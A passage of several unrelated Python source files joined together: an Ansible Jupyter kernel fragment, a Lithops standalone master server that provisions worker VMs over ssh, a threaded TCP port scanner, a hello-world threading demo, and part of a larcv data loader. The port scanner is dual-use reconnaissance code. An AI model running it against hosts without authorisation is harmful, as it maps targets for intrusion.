f.write(yaml.dump({})) tasks.append({'include_vars': {'file': 'widget_vars.yml'}}) tasks.append( {'include_tasks': 'next_task{0}.yml'.format(self.tasks_counter)}) logger.debug(yaml.safe_dump(playbook, default_flow_style=False)) if not os.path.exists(os.path.join(self.temp_dir, 'project')): os.mkdir(os.path.join(self.temp_dir, 'project')) self.playbook_file = (os.path.join(self.temp_dir, 'project', 'playbook.yml')) with open(self.playbook_file, 'w') as f: f.write(yaml.safe_dump(playbook, default_flow_style=False)) # Weird work around for streaming content not showing stream_content = {'name': 'stdout', 'text': '\n'} self.send_response(self.iopub_socket, 'stream', stream_content) # End weird work around self.start_ansible_playbook() logger.info("done") return 
{'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def start_ansible_playbook(self): # We may need to purge artifacts when we start again if os.path.exists(os.path.join(self.temp_dir, 'artifacts')): shutil.rmtree(os.path.join(self.temp_dir, 'artifacts')) logger.info("runner starting") env = os.environ.copy() env['ANSIBLE_KERNEL_STATUS_PORT'] = str(self.helper.status_socket_port) self.runner_thread, self.runner = ansible_runner.run_async(private_data_dir=self.temp_dir, playbook="playbook.yml", quiet=True, debug=True, ignore_logging=True, cancel_callback=self.cancel_callback, finished_callback=self.finished_callback, event_handler=self.runner_process_message) logger.info("runner started") logger.info("Runner status: {}".format(self.runner.status)) while self.runner.status in ['unstarted', 'running', 'starting']: logger.info("In runner loop") try: logger.info("getting message %s", self.helper.pause_socket_port) msg = self.queue.get(timeout=1) except queue.Empty: logger.info("Queue Empty!") continue logger.info(msg) if isinstance(msg, StatusMessage): if self.process_message(msg.message): break elif isinstance(msg, TaskCompletionMessage): logger.info('msg.task_num %s tasks_counter %s', msg.task_num, self.tasks_counter) break elif not self.is_ansible_alive(): logger.info("ansible is dead") self.do_shutdown(False) break logger.info("Bottom of runner loop") time.sleep(1) logger.info("Runner state is now {}".format(self.runner.status)) self.clean_up_task_files() logger.info("done") def process_widgets(self): # Extract values from widgets # Values in widgets with a var_name property are added to the vars file # Values in widgets with a ansible_kernel_property are store into special variables widget_vars_file = os.path.join(self.temp_dir, 'project', 'widget_vars.yml') logger.debug("widget_vars_file %s", widget_vars_file) widget_vars = {} for widget in sorted(self.widgets.values(), key=lambda x: x['widget_update_order']): 
logger.debug("widget %s", pformat(widget)) if 'var_name' in widget and 'value' in widget: widget_vars[widget['var_name']] = widget['value'] if 'ansible_kernel_property' in widget and 'value' in widget: if widget['ansible_kernel_property'] == 'vault_password': self.vault_password = widget['value'] logger.debug("set vault_password") # Save the vars from the widgets and include it for this task with open(widget_vars_file, 'w') as f: f.write(yaml.safe_dump(widget_vars, default_flow_style=False)) def do_execute_task(self, code): if not self.is_ansible_alive(): logger.info("ansible is dead") self.do_shutdown(False) if self.helper is None: output = "No play found. Run a valid play cell" stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} self.registered_variable = None self.current_task = code try: code_data = yaml.load(code, Loader=yaml.FullLoader) except Exception: code_data = code logger.debug('code_data %s', code_data) logger.debug('code_data type: %s', type(code_data)) if isinstance(code_data, str): if (code_data.endswith("?")): module = code_data[:-1].split()[-1] else: module = code_data.split()[-1] data = self.get_module_doc(module) payload = dict( source='', data=data) logging.debug('payload %s', payload) # content = {'name': 'stdout', 'text': str(payload)} self.send_response(self.iopub_socket, 'display_data', payload) return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} elif isinstance(code_data, list): code_data = code_data[0] elif isinstance(code_data, dict): code_data = code_data elif code_data is None: return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} else: logger.error('code_data %s unsupported type', type(code_data)) if not isinstance(code_data, dict): try: code_data = yaml.load(code, 
Loader=yaml.FullLoader) tb = [] except Exception: tb = traceback.format_exc(1).splitlines() reply = {'status': 'error', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}, 'traceback': ['Invalid task cell\n'] + tb, 'ename': 'Invalid cell', 'evalue': ''} self.send_response(self.iopub_socket, 'error', reply, ident=self._topic('error')) return reply if 'include_role' in code_data.keys(): role_name = code_data['include_role'].get('name', '') if '.' in role_name: self.get_galaxy_role(role_name) if 'register' in code_data.keys(): self.registered_variable = code_data['register'] interrupted = False try: tasks = [] current_task_data = yaml.load(self.current_task, Loader=yaml.FullLoader) current_task_data['ignore_errors'] = True tasks.append(current_task_data) tasks.append({'pause_for_kernel': {'host': '127.0.0.1', 'port': self.helper.pause_socket_port, 'task_num': self.tasks_counter}}) self.process_widgets() tasks.append({'include_vars': {'file': 'widget_vars.yml'}}) # Create the include file task to look for the future task tasks.append( {'include_tasks': 'next_task{0}.yml'.format(self.tasks_counter + 1)}) logger.debug(yaml.safe_dump(tasks, default_flow_style=False)) self.next_task_file = os.path.join(self.temp_dir, 'project', 'next_task{0}.yml'.format(self.tasks_counter)) self.tasks_counter += 1 self.task_files.append(self.next_task_file) with open(self.next_task_file, 'w') as f: f.write(yaml.safe_dump(tasks, default_flow_style=False)) logger.info('Wrote %s', self.next_task_file) self.helper.pause_socket.send_string('Proceed') while True: logger.info("getting message %s", self.helper.pause_socket_port) msg = self.queue.get() logger.info(msg) if isinstance(msg, StatusMessage): if self.process_message(msg.message): break elif isinstance(msg, TaskCompletionMessage): logger.info('msg.task_num %s tasks_counter %s', msg.task_num, self.tasks_counter) break except KeyboardInterrupt: logger.error(traceback.format_exc()) if interrupted: return 
{'status': 'abort', 'execution_count': self.execution_count} return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_execute_python(self, code): code = "".join(code.splitlines(True)[1:]) reply_content = {} res = self.shell.run_cell(code) logger.debug('do_execute_python res %s', pformat(res)) if res.success: reply_content['status'] = 'ok' else: reply_content['status'] = 'error' reply_content['execution_count'] = self.execution_count reply_content['payload'] = self.shell.payload_manager.read_payload() self.shell.payload_manager.clear_payload() self.export_python_variables() return reply_content def export_python_variables(self): try: self.silent = True original_display_trap = self.shell.display_trap self.shell.display_trap = NullDisplayTrap line1 = "import types" line2 = "import json" line3 = "json.dumps([_x for _x, _v in globals().items() if " \ "not _x.startswith('_') and " \ "_x not in ['In', 'Out', 'quit', 'pprint', 'exit', 'get_ipython'] and " \ "not isinstance(_v, types.ModuleType)])" for line in [line1, line2, line3]: res = self.shell.run_cell(line) logger.debug('export_python_variables res %s', pformat(res)) logger.debug('export_python_variables NullDisplay %s', pformat(NullDisplay.exec_result)) variable_values = dict() if res.success and NullDisplay.exec_result: logger.debug('export_python_variables %s', pformat(json.loads(NullDisplay.exec_result))) variable_names = json.loads(NullDisplay.exec_result) NullDisplay.exec_result = None for variable in variable_names: res = self.shell.run_cell('json.dumps({0})'.format(variable)) if res.success and NullDisplay.exec_result: variable_values[variable] = json.loads(NullDisplay.exec_result) NullDisplay.exec_result = None else: logger.debug('export_python_variables error') logger.debug('export_python_variables variable_values %s', pformat(variable_values)) self.do_execute_task(yaml.dump(dict(set_fact=variable_values))) finally: self.silent = False 
self.shell.display_trap = original_display_trap def do_execute_vault_password(self, code): self.shell.run_cell("import ansible_kernel.widgets\n" "style = {'description_width': 'initial'}\n" "ansible_kernel.widgets.VaultPassword(description='Vault Password:', style=style)\n") return {'status': 'ok', 'execution_count': self.execution_count, 'payload': [], 'user_expressions': {}} def do_complete(self, code, cursor_pos): code = code[:cursor_pos] default = {'matches': [], 'cursor_start': 0, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} if code.strip().startswith("#inventory"): return default elif code.strip().startswith("#ansible.cfg"): return default elif code.strip().startswith("#host_vars"): return default elif code.strip().startswith("#group_vars"): return default elif code.strip().startswith("#task"): return self.do_complete_task(code, cursor_pos) elif code.strip().startswith("#play"): return self.do_complete_play(code, cursor_pos) else: return self.do_complete_task(code, cursor_pos) def do_complete_task(self, code, cursor_pos): default = {'matches': [], 'cursor_start': 0, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} logger.debug('code %r', code) if not code or code[-1] == ' ': return default found_module = False code_data = None try: code_data = yaml.load(code, Loader=yaml.FullLoader) except Exception: try: code_data = yaml.load(code + ":", Loader=yaml.FullLoader) except Exception: code_data = None if code_data is not None: logger.debug('code_data %s', code_data) if isinstance(code_data, list) and len(code_data) > 0: code_data = code_data[0] if isinstance(code_data, dict): for key in code_data.keys(): if key in modules: module_name = key found_module = True break logger.debug('found_module %s', found_module) tokens = code.split() if not tokens: return default matches = [] token = tokens[-1] start = cursor_pos - len(token) logger.debug('token %s', token) if not found_module: for module in TASK_ARGS_MODULES: if 
module.startswith(token): matches.append(module) else: for arg in module_args.get(module_name, []) + task_args: if arg.startswith(token): matches.append(arg) if not matches: return default matches = [m for m in matches if m.startswith(token)] return {'matches': sorted(matches), 'cursor_start': start, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} def do_complete_play(self, code, cursor_pos): default = {'matches': [], 'cursor_start': 0, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} logger.debug('code %r', code) if not code or code[-1] == ' ': return default tokens = code.split() if not tokens: return default matches = [] token = tokens[-1] start = cursor_pos - len(token) logger.debug('token %s', token) for arg in play_args: if arg.startswith(token): matches.append(arg) if not matches: return default matches = [m for m in matches if m.startswith(token)] return {'matches': sorted(matches), 'cursor_start': start, 'cursor_end': cursor_pos, 'metadata': dict(), 'status': 'ok'} def do_inspect(self, code, cursor_pos, detail_level=0): logger.debug("code %s", code) logger.debug("cursor_pos %s", cursor_pos) logger.debug("detail_level %s", detail_level) if code.strip().startswith("#inventory"): logger.info("#inentory not supported") return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': True} elif code.strip().startswith("#task"): return self.do_inspect_module(code, cursor_pos, detail_level) elif code.strip().startswith("#play"): logger.info("#play not supported") return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': True} else: return self.do_inspect_module(code, cursor_pos, detail_level) def do_inspect_module(self, code, cursor_pos, detail_level=0): data = dict() code_data = yaml.load(code, Loader=yaml.FullLoader) logger.debug("code_data %s", code_data) if isinstance(code_data, str): module = code_data elif isinstance(code_data, dict): for arg in task_args: if arg in code_data: del code_data[arg] module = code_data.keys()[0] else: 
logger.warn('code type not supported %s', type(code_data)) return {'status': 'ok', 'data': {}, 'metadata': {}, 'found': False} data.update(self.get_module_doc(module)) return {'status': 'ok', 'data': data, 'metadata': {}, 'found': True} def get_galaxy_role(self, role_name): command = ['ansible-galaxy', 'list', '-p', 'project/roles'] logger.debug("command %s", command) p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT) p.wait() exitcode = p.returncode logger.debug('exitcode %s', exitcode) output = p.communicate()[0].decode('utf-8') for line in output.splitlines(): if line.startswith('- '): role, _, version = line[2:].partition(',') role = role.strip() if role == role_name: return p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT, ) command = ['ansible-galaxy', 'install', '-p', 'project/roles', role_name] logger.debug("command %s", command) p = Popen(command, cwd=self.temp_dir, stdout=PIPE, stderr=STDOUT, ) p.wait() exitcode = p.returncode logger.debug('exitcode %s', exitcode) output = p.communicate()[0].decode('utf-8') logger.debug('output %s', output) stream_content = {'name': 'stdout', 'text': str(output)} self.send_response(self.iopub_socket, 'stream', stream_content) def get_module_doc(self, module): data = {} logger.debug("command %s", " ".join( ['ansible-doc', '-t', 'module', module])) p = Popen(['ansible-doc', '-t', 'module', module], stdout=PIPE, stderr=STDOUT, ) p.wait() exitcode = p.returncode logger.debug('exitcode %s', exitcode) output = p.communicate()[0].decode('utf-8') logger.debug('output %s', output) data['text/plain'] = output return data def is_ansible_alive(self): if self.runner_thread is None: logger.info("NOT STARTED") return False if self.runner_thread.is_alive(): logger.info("YES") else: logger.info("NO") return self.runner_thread.is_alive() def cancel_callback(self): logger.info('called') return self.shutdown_requested def finished_callback(self, runner): logger.info('called') self.shutdown = True if not 
self.shutdown_requested: self.queue.put(StatusMessage(['PlaybookEnded', {}])) def do_shutdown(self, restart): if self.is_ansible_alive(): self.shutdown = False self.shutdown_requested = True while not self.shutdown: if not self.is_ansible_alive(): break logger.info("waiting for shutdown") time.sleep(1) logger.info("shutdown complete") self.shutdown_requested = False self.runner_thread = None self.runner = None if self.helper is not None: self.helper.stop() self.helper = None return {'status': 'ok', 'restart': restart} def _format_application_python(self, result): if 'application/x-python' in result: ret_value = result['application/x-python'] del result['application/x-python'] return ret_value return "" def _format_text_html(self, result): if 'text/html' in result: ret_value = result['text/html'] del result['text/html'] return ret_value return "" def _format_output(self, result): if 'stdout_lines' in result: return '\n'.join(result['stdout_lines']) return "" def _format_error(self, result): if 'stderr_lines' in result: return '\n'.join(result['stderr_lines']) return "" def _dump_results(self, result): r = result for key in ['_ansible_verbose_always', '_ansible_no_log', '_ansible_parsed', 'invocation']: if key in r: del r[key] if 'stdout' in r: if r['stdout']: r['stdout'] = '[see below]' if 'stdout_lines' in r: if r['stdout_lines']: r['stdout_lines'] = '[removed for clarity]' if 'stderr' in r: if r['stderr']: r['stderr'] = '[see below]' if 'stderr_lines' in r: if r['stderr_lines']: r['stderr_lines'] = '[removed for clarity]' if 'changed' in r: del r['changed'] if 'reason' in r: return r['reason'] return json.dumps(r, sort_keys=True, indent=4) def set_parent(self, ident, parent): super(AnsibleKernel, self).set_parent(ident, parent) self.shell.set_parent(parent) def send_multipart(self, msg, *args, **kwargs): logger.debug('send_multipart %s %s %s %s', len(msg), msg, args, kwargs) if len(msg) == 7: msg0, msg1, msg2, msg3, msg4, msg5, msg6 = msg logger.debug("msg0 %s", 
msg0) logger.debug("msg1 %s", msg1) logger.debug("msg2 %s", msg2) logger.debug("msg3 %s", pformat(json.loads(msg3))) logger.debug("msg4 %s", pformat(json.loads(msg4))) logger.debug("msg5 %s", pformat(json.loads(msg5))) logger.debug("msg6 %s", pformat(json.loads(msg6))) msg3_data = json.loads(msg3) msg6_data = json.loads(msg6) if msg0.startswith(b"comm"): _, _, comm_id = msg0.partition('-') if msg3_data['msg_type'] == 'comm_open' and msg6_data['comm_id'] == comm_id: self.update_widget(comm_id, msg6_data.get('data', {}).get('state', {})) logger.debug("new widget %s %s", comm_id, pformat(self.widgets[comm_id])) if msg3_data['msg_type'] == 'comm_msg' and msg6_data['comm_id'] == comm_id: if msg6_data.get('data', {}).get('method') == 'update': self.update_widget(comm_id, msg6_data.get('data', {}).get('state', {})) logger.debug("update widget %s %s", comm_id, pformat(self.widgets[comm_id])) def update_widget(self, comm_id, state): self.widgets[comm_id].update(state) self.widgets[comm_id]['widget_update_order'] = self.widget_update_order self.widget_update_order += 1 def comm_open(self, stream, ident, msg): logger.debug("comm_open: %s %s", ident, msg) self.comm_manager.comm_open(stream, ident, msg) def comm_msg(self, stream, ident, msg): logger.debug("comm_msg: %s %s", ident, msg) logger.debug("msg %s", pformat(msg)) comm_id = msg.get('content', {}).get('comm_id', {}) if comm_id in self.widgets: self.widgets[comm_id].update(msg.get('content', {}).get('data', {}).get('state', {})) logger.debug("updated widget %s %s", comm_id, self.widgets[comm_id]) self.comm_manager.comm_msg(stream, ident, msg) def comm_close(self, stream, ident, msg): logger.debug("comm_close: %s %s", ident, msg) self.comm_manager.comm_close(stream, ident, msg)
master.py
#
# Copyright Cloudlab URV 2020
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

import os
import copy
import time
import json
import uuid
import flask
import queue
import logging
import multiprocessing as mp
from pathlib import Path
from gevent.pywsgi import WSGIServer
from concurrent.futures import ThreadPoolExecutor

from lithops.constants import LITHOPS_TEMP_DIR, STANDALONE_LOG_FILE, JOBS_DIR,\
    STANDALONE_SERVICE_PORT, STANDALONE_CONFIG_FILE, STANDALONE_INSTALL_DIR
from lithops.localhost.localhost import LocalhostHandler
from lithops.utils import verify_runtime_name, iterchunks, setup_lithops_logger
from lithops.standalone.utils import get_worker_setup_script
from lithops.standalone.keeper import BudgetKeeper

setup_lithops_logger(logging.DEBUG, filename=STANDALONE_LOG_FILE)
logger = logging.getLogger('lithops.standalone.master')
app = flask.Flask(__name__)

INSTANCE_START_TIMEOUT = 200
MAX_INSTANCE_CREATE_RETRIES = 3

# Module-level state shared between the Flask handlers and the job processes.
STANDALONE_CONFIG = None
STANDALONE_HANDLER = None
BUDGET_KEEPER = None
JOB_PROCESSES = {}   # job_key -> mp.Process running run_job_process()
WORK_QUEUES = {}     # job_key -> managed queue of task payloads
MASTER_IP = None
MP_MANAGER = mp.Manager()


def is_worker_instance_ready(vm):
    """
    Checks if the VM instance is ready to receive ssh connections
    """
    try:
        vm.get_ssh_client().run_remote_command('id')
    except Exception as e:
        logger.debug('ssh to %s failed: %s', vm.ip_address, e)
        # drop the cached client so the next probe opens a fresh connection
        vm.del_ssh_client()
        return False
    return True


def wait_worker_instance_ready(vm):
    """
    Waits until the VM instance is ready to receive ssh connections.

    Raises TimeoutError if the VM is not reachable within
    INSTANCE_START_TIMEOUT seconds.
    """
    logger.info('Waiting %s to become ready', vm)

    start = time.time()
    while time.time() - start < INSTANCE_START_TIMEOUT:
        if is_worker_instance_ready(vm):
            logger.info('%s ready in %s seconds',
                        vm, round(time.time() - start, 2))
            return True
        time.sleep(5)

    msg = 'Readiness probe expired on {}'.format(vm)
    logger.error(msg)
    raise TimeoutError(msg)


def setup_worker(worker_info, work_queue, job_key):
    """
    Run worker process

    Install all the Lithops dependencies into the worker and start the job.
    If the VM never becomes ssh-reachable it is recreated, up to
    MAX_INSTANCE_CREATE_RETRIES times, after which an exception is raised.
    """
    instance_name, ip_address, instance_id = worker_info
    logger.info('Starting setup for VM instance %s', instance_name)

    vm = STANDALONE_HANDLER.backend.get_vm(instance_name)
    vm.ip_address = ip_address
    vm.instance_id = instance_id

    worker_ready = False
    retry = 0
    logger.info('Queue empty: %s - Queue size: %s',
                work_queue.empty(), work_queue.qsize())

    while not worker_ready and not work_queue.empty():
        try:
            wait_worker_instance_ready(vm)
            worker_ready = True
        except TimeoutError:
            # VM not started in time. Fixed: the retry counter is now
            # incremented *before* the limit check, so the failure is
            # actually raised instead of silently proceeding with a
            # non-reachable VM (the original check was unreachable).
            retry += 1
            if retry >= MAX_INSTANCE_CREATE_RETRIES:
                msg = '{} readiness probe failed after {} retries.'.format(vm, retry)
                logger.debug(msg)
                raise Exception(msg)
            logger.info('Recreating VM instance %s', vm.name)
            vm.delete()
            vm.create()

    if work_queue.empty():
        # another worker already drained the queue; nothing to set up
        logger.info('Work queue is already empty. Skipping %s', vm)
        return

    # upload zip lithops package
    logger.info('Uploading lithops files to %s', vm)
    vm.get_ssh_client().upload_local_file('/opt/lithops/lithops_standalone.zip',
                                          '/tmp/lithops_standalone.zip')
    logger.info('Executing lithops installation process on %s', vm)

    vm_data = {'instance_name': vm.name,
               'ip_address': vm.ip_address,
               'instance_id': vm.instance_id,
               'master_ip': MASTER_IP,
               'job_key': job_key}
    script = get_worker_setup_script(STANDALONE_CONFIG, vm_data)
    # run_async: the install script runs on the worker in the background
    vm.get_ssh_client().run_remote_command(script, run_async=True)
    vm.del_ssh_client()
    logger.info('Installation script submitted to %s', vm)


def stop_job_process(job_key):
    """
    Stops a job process: touches the <job_key>.done marker and terminates
    the invoker process if it is still alive.
    """
    global JOB_PROCESSES

    done = os.path.join(JOBS_DIR, job_key + '.done')
    Path(done).touch()

    if job_key in JOB_PROCESSES and JOB_PROCESSES[job_key].is_alive():
        JOB_PROCESSES[job_key].terminate()
        logger.info('Finished job %s invocation', job_key)
        del JOB_PROCESSES[job_key]


def run_job_process(job_payload, work_queue):
    """
    Process responsible to wait for workers to become ready, and submit
    individual tasks of the job to them
    """
    job_key = job_payload['job_key']
    call_ids = job_payload['call_ids']
    chunksize = job_payload['chunksize']
    workers = job_payload['worker_instances']

    # split the job into per-worker task payloads of `chunksize` calls each
    for call_ids_range in iterchunks(call_ids, chunksize):
        task_payload = copy.deepcopy(job_payload)
        dbr = task_payload['data_byte_ranges']
        task_payload['call_ids'] = call_ids_range
        task_payload['data_byte_ranges'] = [dbr[int(call_id)] for call_id in call_ids_range]
        work_queue.put(task_payload)

    logger.info("Total tasks in %s work queue: %s", job_key, work_queue.qsize())

    with ThreadPoolExecutor(len(workers)) as executor:
        for worker_info in workers:
            executor.submit(setup_worker, worker_info, work_queue, job_key)

    logger.info('All workers set up for job %s', job_key)

    # block until every task has been handed out, then mark the job done
    while not work_queue.empty():
        time.sleep(1)

    done = os.path.join(JOBS_DIR, job_key + '.done')
    Path(done).touch()
    logger.info('Finished job %s invocation.', job_key)


def error(msg):
    """Build a 404 JSON error response."""
    response = flask.jsonify({'error': msg})
    response.status_code = 404
    return response


@app.route('/get-task/<job_key>', methods=['GET'])
def get_task(job_key):
    """
    Returns a task from the work queue
    """
    global WORK_QUEUES
    global JOB_PROCESSES

    try:
        task_payload = WORK_QUEUES[job_key].get(timeout=0.1)
        response = flask.jsonify(task_payload)
        response.status_code = 200
        logger.info('Calls %s invoked on %s',
                    ', '.join(task_payload['call_ids']),
                    flask.request.remote_addr)
    except (KeyError, queue.Empty):
        # KeyError: unknown/already-cleared job key (previously crashed with
        # HTTP 500); queue.Empty: no more tasks. Either way, stop the job.
        stop_job_process(job_key)
        response = ('', 204)

    return response


@app.route('/clear', methods=['POST'])
def clear():
    """
    Stops received job processes
    """
    global JOB_PROCESSES

    job_key_list = flask.request.get_json(force=True, silent=True)

    for job_key in job_key_list:
        if job_key in JOB_PROCESSES and JOB_PROCESSES[job_key].is_alive():
            logger.info('Received SIGTERM: Stopping job process %s', job_key)
            stop_job_process(job_key)

    return ('', 204)


@app.route('/run', methods=['POST'])
def run():
    """
    Run a job. In 'consume' mode the job runs locally on this VM; in
    'create' mode a background process feeds a work queue served to the
    worker VMs via /get-task.
    """
    global BUDGET_KEEPER
    global WORK_QUEUES
    global JOB_PROCESSES

    job_payload = flask.request.get_json(force=True, silent=True)
    if job_payload and not isinstance(job_payload, dict):
        return error('The action did not receive a dictionary as an argument.')

    try:
        runtime = job_payload['runtime_name']
        verify_runtime_name(runtime)
    except Exception as e:
        return error(str(e))

    job_key = job_payload['job_key']
    logger.info('Received job %s', job_key)

    BUDGET_KEEPER.last_usage_time = time.time()
    BUDGET_KEEPER.update_config(job_payload['config']['standalone'])
    BUDGET_KEEPER.jobs[job_key] = 'running'

    exec_mode = job_payload['config']['standalone'].get('exec_mode', 'consume')

    if exec_mode == 'consume':
        # Consume mode runs the job locally
        pull_runtime = STANDALONE_CONFIG.get('pull_runtime', False)
        try:
            localhost_handler = LocalhostHandler({'runtime': runtime,
                                                 'pull_runtime': pull_runtime})
            localhost_handler.invoke(job_payload, workers=1)
        except Exception as e:
            logger.error(e)

    elif exec_mode == 'create':
        # Create mode runs the job in worker VMs
        work_queue = MP_MANAGER.Queue()
        WORK_QUEUES[job_key] = work_queue
        jp = mp.Process(target=run_job_process, args=(job_payload, work_queue))
        jp.daemon = True
        jp.start()
        JOB_PROCESSES[job_key] = jp

    act_id = str(uuid.uuid4()).replace('-', '')[:12]
    response = flask.jsonify({'activationId': act_id})
    response.status_code = 202

    return response


@app.route('/ping', methods=['GET'])
def ping():
    """Liveness probe."""
    response = flask.jsonify({'response': 'pong'})
    response.status_code = 200
    return response


@app.route('/preinstalls', methods=['GET'])
def preinstalls():
    """Return the runtime metadata (preinstalled modules) for a runtime."""
    payload = flask.request.get_json(force=True, silent=True)
    if payload and not isinstance(payload, dict):
        return error('The action did not receive a dictionary as an argument.')

    try:
        runtime = payload['runtime']
        verify_runtime_name(runtime)
    except Exception as e:
        return error(str(e))

    pull_runtime = STANDALONE_CONFIG.get('pull_runtime', False)
    localhost_handler = LocalhostHandler({'runtime': runtime,
                                          'pull_runtime': pull_runtime})
    runtime_meta = localhost_handler.create_runtime(runtime)
    response = flask.jsonify(runtime_meta)
    response.status_code = 200

    return response


def main():
    """Load configuration, start the budget keeper and serve the API."""
    global STANDALONE_CONFIG
    global STANDALONE_HANDLER
    global BUDGET_KEEPER
    global MASTER_IP

    os.makedirs(LITHOPS_TEMP_DIR, exist_ok=True)

    with open(STANDALONE_CONFIG_FILE, 'r') as cf:
        STANDALONE_CONFIG = json.load(cf)

    # Delete ssh_key_filename: it is only valid on the client machine
    backend = STANDALONE_CONFIG['backend']
    if 'ssh_key_filename' in STANDALONE_CONFIG[backend]:
        del STANDALONE_CONFIG[backend]['ssh_key_filename']

    vm_data_file = os.path.join(STANDALONE_INSTALL_DIR, 'access.data')
    with open(vm_data_file, 'r') as ad:
        MASTER_IP = json.load(ad)['ip_address']

    BUDGET_KEEPER = BudgetKeeper(STANDALONE_CONFIG)
    BUDGET_KEEPER.start()
    STANDALONE_HANDLER = BUDGET_KEEPER.sh

    server = WSGIServer(('0.0.0.0', STANDALONE_SERVICE_PORT),
                        app, log=app.logger)
    server.serve_forever()


if __name__ == '__main__':
    main()
scanner.py
import struct
import socket
import threading
import queue
import errno
import logging
from enum import Enum, auto

logger = logging.getLogger(__name__)


class PortState(Enum):
    """Classification of a scanned TCP port."""
    OPEN = auto()
    CLOSED = auto()
    FILTERED = auto()


class TCPScanner:
    """Multi-threaded TCP connect() scanner for a set of ports on one host.

    Results are accumulated in ``self.results`` as (port, PortState) tuples.
    ``self.failed`` is set if any worker hits an unexpected error, which
    makes the remaining workers stop early.
    """

    def __init__(self, host, ports, timeout=5):
        self.host = host
        self.ports = ports
        self.timeout = timeout
        self.results = []             # (port, PortState) tuples
        self.q = queue.SimpleQueue()  # ports still to be probed
        self.failed = False

    def scan(self, num_threads=5):
        """Scan all ports using *num_threads* workers; blocks until done."""
        for port in self.ports:
            self.q.put(port)

        threads = []
        for _ in range(num_threads):
            t = threading.Thread(target=self.run)
            t.start()
            threads.append(t)

        for t in threads:
            t.join()

    def run(self):
        """Worker loop: drain the port queue until empty or a worker failed."""
        while not self.failed:
            try:
                port = self.q.get(block=False)
            except queue.Empty:
                break
            try:
                self._scan(port)
            except Exception as e:
                logger.exception(e)
                self.failed = True
                break

    def _scan(self, port):
        """Probe a single port with connect_ex() and record its state.

        Fixed: the socket is now always closed (the original leaked it on
        the timeout path), and the Linux-only magic numbers 111/11 are
        replaced with portable ``errno`` constants.
        """
        conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        try:
            # SO_LINGER(on, 0): close() sends an RST instead of lingering
            # in TIME_WAIT, so repeated scans don't exhaust local ports.
            conn.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
                            struct.pack("ii", 1, 0))
            conn.settimeout(self.timeout)
            ret = conn.connect_ex((self.host, port))
            if ret == 0:
                # DATA RECEIVED - SYN ACK
                logger.debug('%s:%d - tcp open (SYN-ACK packet)', self.host, port)
                self.results.append((port, PortState.OPEN))
            elif ret == errno.ECONNREFUSED:
                # RST RECEIVED - PORT CLOSED (was hard-coded 111)
                logger.debug('%s:%d - tcp closed (RST packet)', self.host, port)
                self.results.append((port, PortState.CLOSED))
            elif ret in (errno.EAGAIN, errno.ETIMEDOUT):
                # no answer within the timeout (was hard-coded 11): filtered
                self.results.append((port, PortState.FILTERED))
            else:
                logger.debug('%s:%d - code %d', self.host, port, ret)
        except socket.timeout:
            self.results.append((port, PortState.FILTERED))
        finally:
            conn.close()
hello_world.py
#!/usr/bin/python
# Hello World with Python multithreading: a user-defined function is run
# on a worker thread started from Main().
import threading


def MyFunction():
    """Worker entry point: print a greeting from the spawned thread."""
    # Py3 print function (the original used the Py2 print statement).
    # The stray open("file.abc") was removed: the file never existed,
    # the handle was never closed, and the result was unused.
    print("Hello World")


def Main():
    """Create a thread targeting MyFunction and wait for it to finish."""
    myThread = threading.Thread(target=MyFunction)
    myThread.start()  # Starting a thread
    # join() so the greeting is guaranteed to be printed before we return
    # (the original also opened/closed an unrelated "def.txt", which
    # crashed when the file was absent; removed).
    myThread.join()


if __name__ == '__main__':
    Main()
dataloader3.py
# Threaded larcv IO: background threads copy batches produced by a
# larcv.ThreadProcessor into numpy buffers for consumption by training code.
# Ported to Python 3: range/items, tuple except clauses, floor division,
# and the AttrbuteError -> AttributeError typo fixed.
from larcv import larcv
import ROOT as rt
import sys
import time
import os
import signal
import numpy as np
import threading


def threadio_func(storage, proc):
    """Background-thread loop: refill *storage* whenever it was consumed.

    Polls *proc* until the storage slot reports status 3 (batch ready),
    then copies the batch into the storage object. Exits when
    storage._threaded is cleared by stop_manager().
    """
    storage._threaded = True
    while storage._threaded:
        time.sleep(0.000005)
        if storage._filled:
            continue
        storage._read_start_time = time.time()
        # busy-wait until the ThreadProcessor flags this slot ready (state 3)
        while True:
            if proc.storage_status_array()[storage._storage_id] == 3:
                storage._read_end_time = time.time()
                break
            time.sleep(0.000005)
        storage.next()
        storage._event_ids = proc.processed_entries(storage._storage_id)
        storage._ttree_entries = proc.processed_entries(storage._storage_id)
    return


class threadio_storage(object):
    """One batch-storage slot: a named collection of threadio_pydata buffers."""

    def __init__(self, storage_id):
        self._storage_id = int(storage_id)
        self._storage_m = {}          # name -> threadio_pydata
        self._filled = False          # True once next() copied a batch in
        self._threaded = False        # cleared to stop the IO thread
        self._empty = False
        self._read_start_time = self._read_end_time = -1
        self._copy_start_time = self._copy_end_time = -1
        self._event_ids = None
        self._ttree_entries = None
        assert self._storage_id >= 0

    def register(self, key, dtype, make_copy=False):
        """Register a named data product of *dtype*; *key* must be unique."""
        assert key not in self._storage_m
        self._storage_m[key] = threadio_pydata(key, dtype)
